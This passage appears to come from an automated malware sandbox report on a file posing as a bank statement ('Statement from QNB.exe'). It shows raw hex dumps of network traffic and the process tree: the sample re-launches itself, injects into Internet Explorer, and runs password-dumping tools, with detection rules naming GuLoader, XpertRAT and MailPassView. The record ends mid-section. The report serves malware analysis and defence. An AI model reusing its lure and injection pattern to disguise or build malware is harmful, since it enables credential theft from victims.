ce ac 8f 86 ee d8 d6 53 4a 89 fa 92 98 31 3e fb 8c ef a0 c6 77 f8 18 79 53 07 ed 36 98 2c 5f 68 c4 f8 aa 2d b1 bb cd fa 7e 8d d8 14 b0 5e 3f da af 64 85 a8 7f 83 a5 b6 6f dd 40
                                                                                                  Data Ascii: u+@''KgyevGBd_0w+lX-U3[qm%C|3UOXHm>iZM.qZz8haF0PKR^Ttp&Q.>fTGT}*ip9*-hSJ1>wyS6,_h-~^?do@
                                                                                                  2021-11-24 13:17:21 UTC704INData Raw: cc 7c 61 2f 2d 23 8a f1 b7 a4 ad 7b 8e a6 27 a0 72 21 62 08 22 0a 76 e5 95 38 82 28 da 3f aa 68 9d dd 3f d6 15 1c dc ed 4b b0 c5 8b 9a 44 93 ed be fe 97 ce 58 4a d6 c7 30 31 65 51 92 ce 4c 5b f6 49 84 60 61 bb 1e 7e 72 6e 85 c9 c3 de 12 4d 0e 94 5c 46 ce 0a 56 f4 4f 10 6c 41 11 be 49 5c df 1f 7e 24 1e 4c d9 56 0a 11 4c 5c b5 31 5d 07 ad 84 38 65 c3 a2 8d 82 50 bf bf 8a 65 d9 30 08 4f 71 2f 43 e6 0e 70 9a 90 7d 26 b7 4d 8b 55 90 e3 73 52 78 24 2d 67 37 51 69 f3 a8 c1 e9 fc 87 f7 e5 e9 a0 a1 a2 e4 80 5d b0 9a 6d d5 f8 b4 36 29 87 c9 04 80 3c 31 43 96 21 05 05 ec eb 95 a4 99 5d a5 ed bc ac 9a dd 48 e3 ce 09 7e 19 20 54 a1 24 3d 06 7b 7e cd 9a eb 96 fd 14 3e 79 b0 0a 0a cb ed 5a cc 95 ff ce b6 25 4f 8e 0b 00 7e fa 5e b9 b5 b5 a9 ca 67 a0 7c e8 cd ca 68 1c 69
                                                                                                  Data Ascii: |a/-#{'r!b"v8(?h?KDXJ01eQL[I`a~rnM\FVOlAI\~$LVL\1]8ePe0Oq/Cp}&MUsRx$-g7Qi]m6)<1C!]H~ T$={~>yZ%O~^g|hi
                                                                                                  2021-11-24 13:17:21 UTC705INData Raw: cf 2a 1e 87 d6 20 42 7b a6 c4 0b 83 11 7b 96 29 69 a2 e1 60 7d ac a4 96 36 af 4b 20 d9 52 69 7d 1d 3d a3 f9 af 71 23 4d be 30 c4 2a 55 99 78 db 95 10 43 ca 2f 57 55 eb 78 01 6b d5 fb 24 4c 69 7b 15 c6 7c 15 e0 47 7e bc 64 46 e1 1e 83 8c 45 e1 87 d7 16 dd fa 5e e9 5e 94 0c ff 60 6d 49 9d ee 51 58 35 77 a2 6a e1 c5 53 c6 ee b5 91 49 76 81 dc 54 be eb 11 f4 b3 da 11 1f 76 6f 83 c3 40 d7 6f 4d d2 27 3d 20 f2 76 d7 75 0a 43 76 14 2c 97 55 f6 46 ad 50 64 bd 83 a5 dd 58 53 5b e2 98 c5 e2 a7 ec c1 6c 00 28 b7 02 6d 8a 7b 66 08 63 96 17 6a ab 9e 50 c7 12 1a e6 1e 37 10 c0 3e 39 59 9e 1f cc 98 83 c2 f5 14 9a a1 a3 ab fd 67 d5 45 98 32 38 f8 df 93 df 1b 1f 37 a1 49 64 ae c4 c7 30 51 91 f1 b2 45 f2 e8 ed c0 8b de f6 1b 25 9f f7 cc 4f bb 4d 6c fb cc a6 5f a6 35 bd 80
                                                                                                  Data Ascii: * B{{)i`}6K Ri}=q#M0*UxC/WUxk$Li{|G~dFE^^`mIQX5wjSIvTvo@oM'= vuCv,UFPdXS[l(m{fcjP7>9YgE287Id0QE%OMl_5
                                                                                                  2021-11-24 13:17:21 UTC707INData Raw: 30 e2 a9 c7 b6 cd 7b 66 7f 40 cd 48 46 e0 87 b5 4e 30 fc cd ba 8f 98 3c b5 c9 46 ba 25 43 13 31 b9 5c c3 99 d0 c4 75 8a fc 96 a4 f0 ea c7 ba 4a f2 0b c4 04 25 a1 50 b6 cf 65 f4 f2 ee 8d 0b 29 6d 1d fa 3f 9a aa f8 d8 de 17 5c 28 cb e6 f4 4f 1c 5b 63 88 60 85 61 06 db fe 62 40 92 db 8e 9d b1 cb c2 e9 69 a8 da b3 19 8c 4c f8 7d ae 60 37 2b ea 22 18 25 a5 66 41 ac ca 95 62 1d 5c 76 dd 4a 3b dc c2 92 a7 c1 9e 45 41 fc 81 4c e1 cf b6 87 f8 63 a6 27 e5 11 4f 95 b8 fd 22 61 2d fc 0b 2c f4 e3 d4 9c aa da d1 b4 53 53 83 39 a8 83 69 5c 68 56 42 69 1a d5 ee 75 16 74 f3 c4 e7 85 14 bb 5b db 8b 29 2e 39 68 8c 58 e3 ca ff 9d 1d 9f 4c 3a f9 c2 86 38 15 df 8f 65 db 4e 94 ba 30 7a 44 8d 15 27 01 af fe d5 83 39 42 05 4a 47 21 d2 4e 8e ef c0 53 63 c1 dd 50 4d a4 9c 99 13 ff
                                                                                                  Data Ascii: 0{f@HFN0<F%C1\uJ%Pe)m?\(O[c`ab@iL}`7+"%fAb\vJ;EALc'O"a-,SS9i\hVBiut[).9hXL:8eN0zD'9BJG!NScPM
                                                                                                  2021-11-24 13:17:21 UTC708INData Raw: c5 5b 98 ff ee 75 da 8e 0e b7 a8 3f 0c ec b8 46 60 15 cf 86 a6 11 f3 67 68 9e 61 7f fa 4b 30 6b 78 78 f4 02 76 73 3d a1 c4 06 02 28 b9 5f 85 fb de 78 da 3b 9d f2 1b a2 18 21 d6 79 a7 2f 06 f7 f5 53 1b dc 67 14 22 a7 35 c8 82 88 16 e5 4d 4d e8 f8 71 e4 3e 23 21 3a 1f 79 72 d2 2a 3e 3f 73 3e 6e e9 4c e3 eb 70 d8 9d a0 b7 7c 3b 13 be 60 15 f8 1d bb 0f 78 9e e1 d9 c2 a3 9b 01 a2 f6 dd d0 e5 f5 06 1b 4b 64 12 d2 e8 bc 66 77 fc 56 7b 98 b7 61 c9 5a 01 0d 40 50 76 54 03 73 ca 0a c5 c7 1f 87 88 1a 3f 6f 24 37 55 ca a3 7a 05 8f f1 71 d2 db a7 60 6f cc ff a5 84 e4 5f 10 80 82 98 f7 3c 24 fd 03 44 44 73 4f b9 67 27 2c ee df 8d 12 e7 77 16 09 af 37 74 d6 cc c4 24 91 23 52 9c 64 2f 61 0d 23 07 ac c8 dc 68 c5 d6 a6 bb f2 a9 d8 87 47 ab b3 a3 f4 5b 45 7a 0f 41 83 34 82
                                                                                                  Data Ascii: [u?F`ghaK0kxxvs=(_x;!y/Sg"5MMq>#!:yr*>?s>nLp|;`xKdfwV{aZ@PvTs?o$7Uzq`o_<$DDsOg',w7t$#Rd/a#hG[EzA4
                                                                                                  2021-11-24 13:17:21 UTC709INData Raw: f5 fc 75 dc ae de 58 37 77 62 f5 02 e7 25 b0 3e 99 9f 79 22 30 31 52 f4 c3 9b 1c 47 3b 0e 54 dc 2c 0d 10 7a 1f d3 4d a3 e4 81 a1 a3 9c b0 15 bd 80 f2 b3 7e eb 48 3a a5 67 1e d7 18 00 4e 6e 23 9b 1d 72 7c 8d 0c 59 a2 8f 55 27 aa 36 da b8 24 62 a1 61 98 9f 82 39 40 97 71 9f 91 ee 2b 93 74 a0 fd e2 dd 4d 75 92 61 fd 15 e0 7e 9f 31 80 84 12 4e 2b b7 3d 6b b2 e0 25 17 e2 04 95 a9 fb 95 f3 84 f0 b6 4f 7c 33 c4 ee 0e 57 70 19 bb 28 3b 7a 5c d7 6a 58 20 34 dc 40 91 9f 27 d6 3e cc ae 05 bf eb a5 a7 7c ba 9c 64 05 49 3b 36 a2 c3 58 87 7b f5 34 29 fa 4c b6 ca 37 5a 16 af b9 5c 81 31 86 a6 16 b1 26 02 06 a0 88 77 1a 78 f6 9c af 83 c3 f7 c0 98 38 5e 57 e7 d0 b1 34 d7 12 6c ab d4 8f d2 9a 33 f4 6b fa b2 17 89 81 c4 c8 6e a4 a2 35 c7 df a2 8e f3 c4 53 e9 78 31 58 5f d5
                                                                                                  Data Ascii: uX7wb%>y"01RG;T,zM~H:gNn#r|YU'6$ba9@q+tMua~1N+=k%O|3Wp(;z\jX 4@'>|dI;6X{4)L7Z\1&wx8^W4l3kn5Sx1X_
                                                                                                  2021-11-24 13:17:21 UTC710INData Raw: d6 8b 1d 93 34 81 b3 eb d0 f8 15 60 e4 d0 16 30 f6 f0 58 c5 1a 12 00 56 54 f2 2a e1 2b fc 5a 11 5b c9 8d 2c 4f c4 f6 1e da e7 ba 61 95 a3 f0 f7 d1 22 95 61 0e 08 af 53 45 36 61 4f 29 34 c7 96 02 91 83 a5 60 ed 59 4d 77 fb 79 ab 77 1b 87 7f b5 5a 76 fc 82 1a 2f 3f be e4 61 18 d4 41 04 1a 2b 4f 99 54 0d e5 06 cc a3 0e c4 e0 e6 e7 33 00 65 94 84 8b 24 da 28 d0 e1 cf 26 2b 69 17 33 71 45 0e 59 6b 82 12 62 3e 69 fe b1 e8 d3 f3 b2 2c e9 32 3f f1 de 4c ac a7 0e d8 48 57 5b d2 e8 a5 4e 88 2a 94 6d d9 f8 21 83 62 c2 29 9e f1 00 56 c5 0f 35 50 61 d7 fa 0d a4 4e a3 37 e1 5b ee 49 02 31 f4 48 c5 95 2e c2 94 10 a6 26 7f 62 e5 6b 95 e7 d9 f9 27 08 85 9e 0e bf c1 5f 65 81 fb f8 94 96 b3 71 52 81 58 d2 41 20 15 ab 24 97 a4 03 c2 00 77 fe e4 b5 08 c8 f8 4c 72 99 cb 4c 0f
                                                                                                  Data Ascii: 4`0XVT*+Z[,Oa"aSE6aO)4`YMwywZv/?aA+OT3e$(&+i3qEYkb>i,2?LHW[N*m!b)V5PaN7[I1H.&bk'_eqRXA $wLrL
                                                                                                  2021-11-24 13:17:21 UTC712INData Raw: 91 dd 68 08 3d 69 da 94 97 96 9b 6f 52 5a 0e bd d6 b1 dc 64 9f aa 46 a8 fa d6 15 e0 ad c4 1d ae d3 90 75 31 52 72 44 22 3b df 41 f7 15 d2 4f 0f 66 35 4a 08 0a 6e a2 28 5a 36 ca 52 8f a9 47 d1 bb 9c 12 af c3 75 14 7f d0 c3 79 43 64 d7 33 6b 7f 37 71 25 08 94 9a ab 56 ae 4e 8c fc 57 b4 a2 52 01 e6 fb ff 90 21 88 32 ee a6 9d 99 16 a2 fb a6 0d fd f5 e8 32 43 67 b1 3e 0e d8 3a 84 c4 fb f4 84 b6 53 6b ec 8c ac d3 78 98 c0 51 c2 c0 8c 4f 9b 87 bb 8e 78 6f db 1e 48 38 83 92 e2 f9 68 83 13 5d c3 ed 58 01 76 33 8b 34 5d 80 20 6c 20 e3 ed 04 00 a0 6d 23 7b 8e 7e 0a 63 91 03 12 e9 e5 a5 28 aa 66 e8 b6 b8 79 eb 06 15 95 89 e8 ce 20 59 69 39 e0 ff 8a df d2 13 d4 2e ae c9 26 d3 8c 1e b2 34 9f ca 69 0a 46 92 57 a9 e3 f8 1f f9 93 3e 85 9a 46 32 15 aa 44 e4 5d e6 bc 03 8d
                                                                                                  Data Ascii: h=ioRZdFu1RrD";AOf5Jn(Z6RGuyCd3k7q%VNWR!22Cg>:SkxQOxoH8h]Xv34] l m#{~c(fy Yi9.&4iFW>F2D]
                                                                                                  2021-11-24 13:17:21 UTC713INData Raw: 01 95 86 48 39 3c a4 9a 4e 11 54 d7 8b 7b 9e f6 c1 e4 7a 33 9c 5e a8 6c da 5f 29 38 a5 06 d8 cb 51 8a 39 0f 68 4e 3e 5d 94 63 82 27 c1 ef bf da ab 8f 61 e4 32 ed bb 6f 9a c5 f9 d9 8c ce 26 7b 2c a8 e4 7e 48 93 92 d2 46 d4 39 c0 d6 11 23 19 18 7f ac 60 fe 6e 33 4a 20 d2 3d 65 c9 22 6d 0c 4e 86 75 77 b9 ba 9c 1c e6 59 5a 93 70 eb 69 96 b1 ff 9f 93 1d 87 ca d4 52 ed 7c cc 4e 92 88 e7 b1 d8 70 3d 17 3e 3b 45 43 44 dd 9f 04 e2 2d dd a3 81 21 63 f7 50 e2 98 6d eb e7 54 52 6a 6c 7b 09 57 4a 97 34 8b f1 cf a9 55 36 0f 26 d7 99 5f 53 f8 93 cb c7 cb 23 6d fb bc 30 3a 3d 5f eb df b1 42 04 f3 a7 e0 9b 3c fb cf 6a eb 2e 73 55 32 f9 5c cb 9b ff b1 fa 75 5b f6 c9 9e 15 50 f3 ea a7 26 a3 0f 36 ac 5a b8 7e 5a a0 f2 67 d4 51 76 6d 19 f0 15 c9 5f ec f9 d4 49 19 dd 65 f7 c0
                                                                                                  Data Ascii: H9<NT{z3^l_)8Q9hN>]c'a2o&{,~HF9#`n3J =e"mNuwYZpiR|Np=>;ECD-!cPmTRjl{WJ4U6&_S#m0:=_B<j.sU2\u[P&6Z~ZgQvm_Ie
                                                                                                  2021-11-24 13:17:21 UTC714INData Raw: fb d1 c9 84 86 0d cb 64 d0 e4 1c 76 ed a7 63 c6 2a 97 39 cd 3f 08 1a 59 41 3d b4 db 82 5e f2 a7 af d6 fe f6 72 31 ca 44 43 a1 26 08 e1 a8 eb 35 b4 ab 8e f6 a1 07 bd 59 05 6e 8e b3 93 81 5e 93 39 c2 e2 8d 6f 68 a2 79 1e 72 b4 db 22 d1 4e f6 c1 45 14 b0 1c 54 52 95 23 9b 2e e6 fd 1e 26 bc d0 2b 6a a4 1c c1 82 04 e3 1b 03 e9 67 66 f3 7d b0 44 be 95 37 f1 ad 84 3d ea 78 7c b1 fb af 6f 35 3a 2b b2 57 4e 38 4c cb 1f b5 fd 5c 33 68 10 20 ec ae 03 29 39 e9 ac f7 76 e5 94 86 05 20 d6 5a bd 4c bd 0b 6c ca 09 88 3c c0 37 1c 31 cd a4 c2 3e ea b4 b4 30 04 ca 3f 3a e5 a6 1f 62 6a 85 9d 7a a7 a0 e5 db 93 6a 00 c7 65 1c f0 49 5a ab 03 f6 13 27 9e 3b 19 25 b9 71 35 23 e5 61 40 c9 42 95 3f 74 5a 87 69 81 2d 40 44 75 49 57 91 b2 f4 fc 9c 5f 0c 00 3c 67 0a c5 f2 85 56 9d 32
                                                                                                  Data Ascii: dvc*9?YA=^r1DC&5Yn^9ohyr"NETR#.&+jgf}D7=x|o5:+WN8L\3h )9v ZLl<71>0?:bjzjeIZ';%q5#a@B?tZi-@DuIW_<gV2
                                                                                                  2021-11-24 13:17:21 UTC715INData Raw: e8 4a 6b b7 0a 6f e2 6c fa 93 ea fc 94 b7 ee c6 6c 57 98 0e a3 e7 4d 4a 71 0e d6 29 67 94 a7 ff fc c1 44 f1 20 ca 0f 58 45 5e 16 9b ea 58 ff d2 62 dc 06 e5 22 36 54 74 82 73 af 04 69 3a 52 92 ec f5 bf fd 67 5b a8 22 b4 49 f6 3a d4 03 e1 26 06 b6 28 35 b0 32 ab 0c b4 13 4e 9d 18 df c4 c6 6c 70 94 8e 39 9b df de d6 18 33 6a 3c 14 d6 ec 60 bc a1 c7 ad 88 3c fe 86 a8 5e 6d cb 87 e2 e0 7e 5d a5 22 ac 52 fe 34 43 a2 71 c8 56 57 fd 83 13 83 18 c0 18 8b 9b f5 21 07 03 08 95 d7 56 65 2b 04 1a 85 87 17 15 a6 c2 63 23 89 01 d6 8a e0 92 cd 72 46 47 03 54 9f 52 0c 9e 32 df 60 b5 5f 9b be 4f 2a e7 96 45 a6 e5 1c 6e 15 04 06 91 9f 00 83 57 2f ae 69 6e 25 14 a1 59 55 48 83 17 60 a6 38 d8 29 1e cd 20 a0 84 27 f8 19 10 b2 7e 1b 91 7a 16 60 87 ad a1 76 b6 17 b5 7a 57 de 86
                                                                                                  Data Ascii: JkollWMJq)gD XE^Xb"6Ttsi:Rg["I:&(52Nlp93j<`<^m~]"R4CqVW!Ve+c#rFGTR2`_O*EnW/in%YUH`8) '~z`vzW
                                                                                                  2021-11-24 13:17:21 UTC717INData Raw: 73 7e f1 2c b2 a3 48 e5 51 c4 ab 0e 4e be 63 9d 01 a4 a0 0d 8d 58 93 42 cf 5d 43 fa d4 e5 2f 1e 56 1a 81 09 76 35 36 87 34 b5 ce 6a 70 d6 61 55 bf 84 5f 5c 16 98 bc 93 4d fd ed 93 70 37 db ef d7 10 9b 49 52 98 71 c6 0f 8c 09 57 10 8d b4 db 2a a0 87 ae 79 18 93 28 43 83 b6 65 66 09 8d b0 7f b4 cc 84 ec f2 79 68 e6 05 09 fa 59 3e bd 6e 9c d2 56 d2 29 75 59 bc 08 06 3f ca 6a 29 dd 3d f7 27 ab 25 af 6e 92 42 69 22 12 28 fa 06 c3 fa 0c 8a 6b 68 17 34 49 69 cb 00 f4 7b fa 23 e8 86 67 d6 93 24 5c 4e 14 d1 03 40 a2 f4 33 21 5a 30 49 f2 67 fa 51 88 b4 9f c3 8f de 06 0e af 45 5c 44 46 84 d7 1f 9d 1d a9 28 f1 4c fc 52 9f d7 5a 4d f3 e0 23 4b 4a ea 76 39 fa b7 7c 60 52 e9 82 d6 42 b8 31 46 89 aa 26 38 cf 77 49 b2 38 b8 9d 6b e0 88 f3 2e 63 3a 6f 3c c2 f5 c8 78 65 8d
                                                                                                  Data Ascii: s~,HQNcXB]C/Vv564jpaU_\Mp7IRqW*y(CefyhY>nV)uY?j)='%nBi"(kh4Ii{#g$\N@3!Z0IgQE\DF(LRZM#KJv9|`RB1F&8wI8k.c:o<xe
                                                                                                  2021-11-24 13:17:21 UTC718INData Raw: 1a ef ac 52 f7 3d c4 ab 6d 69 28 34 58 42 f4 2f d4 ee f3 d4 e0 0f d8 b9 b4 d0 ea d9 e7 9f 95 3e b7 5d 50 c4 53 c3 74 30 c1 12 9e f3 36 b8 91 6a e3 75 cd 25 fa 80 cf 31 00 b3 ca 95 ce 50 ec 24 64 cf f6 89 59 11 b9 8b 71 21 9a 58 d1 93 e7 ed 89 7a 60 d8 a2 33 e2 e2 6d 9a 6a d2 20 b5 11 99 0e 07 58 26 e2 19 85 f8 01 07 45 36 76 5e b4 4d a1 97 15 eb bf 4d 53 d2 ed 15 58 93 c4 6f 9e af 27 d3 5c 19 41 33 d0 da 56 46 02 20 c8 1b 57 9f 7c b4 1e 82 be d1 ca ee 22 a2 3e 5d ae 12 d0 6a c1 15 ff 6f 25 60 32 79 65 88 e4 64 96 47 27 56 98 93 a3 4a 26 17 c0 38 fa f9 e7 e2 5a 37 53 cc e1 b2 c7 49 18 8b 9d 0d cc a2 81 ee d1 ff 6c c2 e9 41 e8 ba 7f 3c b3 cc 32 44 ba c7 48 2c 24 0e 8c b0 a5 5a 91 a2 ab 28 f3 d8 c8 67 a7 c8 24 81 d3 e7 61 06 ba 2a 1a 7a eb 58 4a 3f 3c 6f 23
                                                                                                  Data Ascii: R=mi(4XB/>]PSt06ju%1P$dYq!Xz`3mj X&E6v^MMSXo'\A3VF W|">]jo%`2yedG'VJ&8Z7SIlA<2DH,$Z(g$a*zXJ?<o#
                                                                                                  2021-11-24 13:17:21 UTC719INData Raw: bc dd 81 ec ff 7e 61 f1 14 0c fa 54 39 b4 71 9c da 47 d7 29 78 5e b5 1f 17 3a ca 67 2e d4 22 f7 2f ba 20 af 63 95 4b 7e 33 17 28 f7 01 ca e5 0c 82 7a 6d 17 39 4e 60 dc 11 f1 7b f7 24 e1 99 67 de 82 21 5c 43 13 d8 14 51 a7 f4 3e 26 53 2f 49 fa 76 ff 51 85 b3 96 d4 9e db 06 03 a8 4c 43 44 4e 95 d2 1f 90 1a a0 3f e0 49 fc 5f 98 de 45 4d fb f1 26 4b 47 ed 7f 2e eb b2 7c 6d 55 e0 9d d6 4a a9 34 46 84 ad 2f 2f de 72 49 bf 3f b1 82 6b e8 99 f6 2e 6e 3d 66 2b d3 f0 c8 75 62 84 61 ae ca 79 0b 91 9b 70 40 4d 87 e3 6e b5 30 e5 cb 6c 51 fa 08 38 73 45 4c 9f 2e 57 2b 9e f1 0a 02 8f bb 8c 0f dc 1a 2f 26 b0 c7 23 48 25 50 74 34 5f 52 ea 1c 7f 05 30 39 17 a2 ba 85 ab 82 d7 34 db 52 09 94 d7 38 d8 27 0b 16 46 76 48 a8 b0 d7 16 17 33 a7 58 a5 e3 18 e1 70 b2 34 ee de 67 37
                                                                                                  Data Ascii: ~aT9qG)x^:g."/ cK~3(zm9N`{$g!\CQ>&S/IvQLCDN?I_EM&KG.|mUJ4F//rI?k.n=f+ubayp@Mn0lQ8sEL.W+/&#H%Pt4_R094R8'FvH3Xp4g7


                                                                                                  Code Manipulations

                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  Analysis Process: Statement from QNB.exe PID: 1112 Parent PID: 7688

                                                                                                  General

                                                                                                  Start time:14:15:38
                                                                                                  Start date:24/11/2021
                                                                                                  Path:C:\Users\user\Desktop\Statement from QNB.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\Statement from QNB.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:135168 bytes
                                                                                                  MD5 hash:9C8B626668E14AEB4355EA39D1520E33
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:Visual Basic
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.80792180292.00000000022F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  Reputation:low

                                                                                                  Chronological Activities

                                                                                                  Analysis Process: Statement from QNB.exe PID: 3232 Parent PID: 1112

                                                                                                  General

                                                                                                  Start time:14:15:55
                                                                                                  Start date:24/11/2021
                                                                                                  Path:C:\Users\user\Desktop\Statement from QNB.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\Statement from QNB.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:135168 bytes
                                                                                                  MD5 hash:9C8B626668E14AEB4355EA39D1520E33
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:Visual Basic
                                                                                                  Yara matches:
                                                                                                  • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                  • Rule: JoeSecurity_GenericDropper, Description: Yara detected Generic Dropper, Source: 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_XpertRAT, Description: Yara detected XpertRAT, Source: 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.80790209471.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  Reputation:low

                                                                                                  Chronological Activities

                                                                                                  Analysis Process: iexplore.exe PID: 1736 Parent PID: 3232

                                                                                                  General

                                                                                                  Start time:14:16:13
                                                                                                  Start date:24/11/2021
                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline: C:\Users\user\Desktop\Statement from QNB.exe
                                                                                                  Imagebase:0x860000
                                                                                                  File size:839632 bytes
                                                                                                  MD5 hash:BBF55D48A97497F61781C226E1CEDE6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:Visual Basic
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000C.00000003.81136331884.0000000005E20000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000C.00000003.81135483040.0000000005EC5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000C.00000003.81205248968.0000000005DE0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000C.00000003.81103105159.0000000005DD0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000C.00000003.81120321422.0000000003091000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000C.00000003.81102180166.0000000005DA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GenericDropper, Description: Yara detected Generic Dropper, Source: 0000000C.00000002.85673128439.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_XpertRAT, Description: Yara detected XpertRAT, Source: 0000000C.00000002.85673128439.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GenericDropper, Description: Yara detected Generic Dropper, Source: 0000000C.00000000.80975835945.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_XpertRAT, Description: Yara detected XpertRAT, Source: 0000000C.00000000.80975835945.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GenericDropper, Description: Yara detected Generic Dropper, Source: 0000000C.00000000.80980312275.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_XpertRAT, Description: Yara detected XpertRAT, Source: 0000000C.00000000.80980312275.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000C.00000003.81119221282.0000000005DA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000C.00000003.81119604744.0000000005DE0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GenericDropper, Description: Yara detected Generic Dropper, Source: 0000000C.00000000.80977316956.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_XpertRAT, Description: Yara detected XpertRAT, Source: 0000000C.00000000.80977316956.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GenericDropper, Description: Yara detected Generic Dropper, Source: 0000000C.00000000.80978780847.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_XpertRAT, Description: Yara detected XpertRAT, Source: 0000000C.00000000.80978780847.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000C.00000003.81173119870.0000000005F1A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                  Reputation:low

                                                                                                  Chronological Activities

                                                                                                  Analysis Process: iexplore.exe PID: 2300 Parent PID: 1736

                                                                                                  General

                                                                                                  Start time:14:16:26
                                                                                                  Start date:24/11/2021
                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline: /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss0.txt"
                                                                                                  Imagebase:0x860000
                                                                                                  File size:839632 bytes
                                                                                                  MD5 hash:BBF55D48A97497F61781C226E1CEDE6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low

                                                                                                  Chronological Activities

                                                                                                  Analysis Process: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe PID: 6972 Parent PID: 5088

                                                                                                  General

                                                                                                  Start time:14:16:27
                                                                                                  Start date:24/11/2021
                                                                                                  Path:C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:135168 bytes
                                                                                                  MD5 hash:9C8B626668E14AEB4355EA39D1520E33
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:Visual Basic
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000F.00000002.81297911120.0000000002BE0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 7%, ReversingLabs
                                                                                                  Reputation:low

                                                                                                  Chronological Activities

                                                                                                  Analysis Process: iexplore.exe PID: 3544 Parent PID: 1736

                                                                                                  General

                                                                                                  Start time:14:16:28
                                                                                                  Start date:24/11/2021
                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline: /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss1.txt"
                                                                                                  Imagebase:0x860000
                                                                                                  File size:839632 bytes
                                                                                                  MD5 hash:BBF55D48A97497F61781C226E1CEDE6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
